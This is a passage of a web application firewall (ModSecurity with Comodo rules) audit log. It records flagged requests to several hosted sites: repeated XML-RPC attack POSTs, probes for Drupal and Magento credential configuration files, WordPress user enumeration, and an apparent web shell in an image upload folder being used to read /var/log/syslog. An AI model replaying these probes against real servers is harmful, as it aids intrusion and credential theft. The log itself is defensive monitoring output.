Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7jsBLQPChAjmM6-0iskgAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750000560696856 4275 (- - -) Stopwatch2: 1750000560696856 4275; combined=2389, p1=335, p2=1913, p3=37, p4=49, p5=55, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50c1c940-Z-- --49a23f5c-A-- [15/Jun/2025:20:46:48.958285 +0530] aE7j35K-05zbifgH_rT7gQAAAAU 128.199.112.101 60148 127.0.0.1 7081 --49a23f5c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --49a23f5c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --49a23f5c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7j35K-05zbifgH_rT7gQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000607997133 961219 (- - -) Stopwatch2: 1750000607997133 961219; combined=2226, p1=359, p2=1455, p3=31, p4=47, p5=200, sr=100, sw=134, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49a23f5c-Z-- --7385c64a-A-- [15/Jun/2025:20:47:48.123360 +0530] aE7kGwG_OhOIIVz6TXR16QAAAAA 128.199.112.101 38296 127.0.0.1 7081 --7385c64a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7385c64a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7385c64a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7kGwG_OhOIIVz6TXR16QAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000667159256 964159 (- - -) Stopwatch2: 1750000667159256 964159; combined=2252, p1=402, p2=1485, p3=39, p4=53, p5=172, sr=118, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7385c64a-Z-- --83c3300d-A-- [15/Jun/2025:20:48:48.794861 +0530] aE7kV5K-05zbifgH_rT7sgAAAAU 128.199.112.101 38568 127.0.0.1 7081 --83c3300d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --83c3300d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --83c3300d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7kV5K-05zbifgH_rT7sgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000727828478 966436 (- - -) Stopwatch2: 1750000727828478 966436; combined=2789, p1=493, p2=2007, p3=23, p4=41, p5=146, sr=146, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83c3300d-Z-- --cd429b04-A-- [15/Jun/2025:20:49:48.966181 +0530] aE7klBLQPChAjmM6-0is9QAAAAQ 128.199.112.101 40488 127.0.0.1 7081 --cd429b04-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --cd429b04-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cd429b04-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7klBLQPChAjmM6-0is9QAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000788043599 922638 (- - -) Stopwatch2: 1750000788043599 922638; combined=2164, p1=422, p2=1292, p3=62, p4=69, p5=193, sr=117, sw=126, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd429b04-Z-- --70a15f42-A-- [15/Jun/2025:20:50:49.419362 +0530] aE7k0DhI90Z2oKaiWo6rAAAAAAI 128.199.112.101 42026 127.0.0.1 7081 --70a15f42-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --70a15f42-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --70a15f42-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7k0DhI90Z2oKaiWo6rAAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000848453846 965573 (- - -) Stopwatch2: 1750000848453846 965573; combined=2086, p1=364, p2=1307, p3=47, p4=66, p5=190, sr=105, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --70a15f42-Z-- --7b442d3e-A-- [15/Jun/2025:20:51:37.551438 +0530] aE7lAfRzj1BwdxQoarvPWwAAAAo 208.88.73.86 38714 127.0.0.1 7081 --7b442d3e-B-- GET /sites/default/settings.php HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --7b442d3e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --7b442d3e-H-- Message: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/sites/default/settings.php"] [unique_id "aE7lAfRzj1BwdxQoarvPWwAAAAo"] Stopwatch: 1750000897548606 2891 (- - -) Stopwatch2: 1750000897548606 2891; combined=1660, p1=357, p2=1237, p3=0, p4=0, p5=66, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b442d3e-Z-- --1dab1b12-A-- [15/Jun/2025:20:51:49.603023 +0530] aE7lDNxscloMz_lG7ehsCQAAAAM 128.199.112.101 35524 127.0.0.1 7081 --1dab1b12-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 501 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1dab1b12-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1dab1b12-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7lDNxscloMz_lG7ehsCQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000908623278 979799 (- - -) Stopwatch2: 1750000908623278 979799; combined=2244, p1=356, p2=1503, p3=40, p4=62, p5=176, sr=98, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1dab1b12-Z-- --9d715523-A-- [15/Jun/2025:20:52:49.430181 +0530] aE7lSJK-05zbifgH_rT8FgAAAAU 128.199.112.101 58098 127.0.0.1 7081 --9d715523-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 510 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --9d715523-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9d715523-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7lSJK-05zbifgH_rT8FgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750000968543165 887072 (- - -) Stopwatch2: 1750000968543165 887072; combined=2150, p1=392, p2=1369, p3=45, p4=72, p5=168, sr=123, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d715523-Z-- --b6994c4a-A-- [15/Jun/2025:20:53:49.480823 +0530] aE7lhDhI90Z2oKaiWo6rZAAAAAI 128.199.112.101 47958 127.0.0.1 7081 --b6994c4a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 511 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b6994c4a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b6994c4a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7lhDhI90Z2oKaiWo6rZAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001028555553 925338 (- - -) Stopwatch2: 1750001028555553 925338; combined=2121, p1=367, p2=1315, p3=39, p4=104, p5=183, sr=103, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6994c4a-Z-- --06498a2f-A-- [15/Jun/2025:20:54:49.756779 +0530] aE7lwF0gAfK4E6yok-jXiAAAAA4 128.199.112.101 48006 127.0.0.1 7081 --06498a2f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --06498a2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --06498a2f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7lwF0gAfK4E6yok-jXiAAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001088797275 959585 (- - -) Stopwatch2: 1750001088797275 959585; combined=2404, p1=405, p2=1498, p3=58, p4=79, p5=227, sr=117, sw=137, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --06498a2f-Z-- --0a8fd81a-A-- [15/Jun/2025:20:55:49.989969 +0530] aE7l_dxscloMz_lG7ehsnAAAAAM 128.199.112.101 46396 127.0.0.1 7081 --0a8fd81a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --0a8fd81a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0a8fd81a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7l_dxscloMz_lG7ehsnAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001149063700 926336 (- - -) Stopwatch2: 1750001149063700 926336; combined=2929, p1=501, p2=2019, p3=40, p4=57, p5=196, sr=136, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0a8fd81a-Z-- --8fa1d036-A-- [15/Jun/2025:20:56:01.669262 +0530] aE7mCTC7Dm45DAhop9gRlAAAAAY 208.88.73.86 44256 127.0.0.1 7081 --8fa1d036-B-- GET /app/etc/local.xml HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --8fa1d036-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8fa1d036-H-- Message: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/app/etc/local.xml"] [unique_id "aE7mCTC7Dm45DAhop9gRlAAAAAY"] Stopwatch: 1750001161666102 3231 (- - -) Stopwatch2: 1750001161666102 3231; combined=1930, p1=383, p2=1487, p3=0, p4=0, p5=60, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8fa1d036-Z-- --276bcb4b-A-- [15/Jun/2025:20:56:50.044102 +0530] aE7mOUD4emz4pcZ5aGTe9QAAAAE 128.199.112.101 39998 127.0.0.1 7081 --276bcb4b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --276bcb4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --276bcb4b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7mOUD4emz4pcZ5aGTe9QAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001209096954 947204 (- - -) Stopwatch2: 1750001209096954 947204; combined=2309, p1=392, p2=1499, p3=42, p4=61, p5=201, sr=95, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --276bcb4b-Z-- --70583929-A-- [15/Jun/2025:20:56:53.955263 +0530] aE7mPThI90Z2oKaiWo6rxQAAAAI 159.89.158.231 54402 127.0.0.1 7081 --70583929-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 159.89.158.231 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Encoding: gzip, deflate --70583929-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --70583929-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag 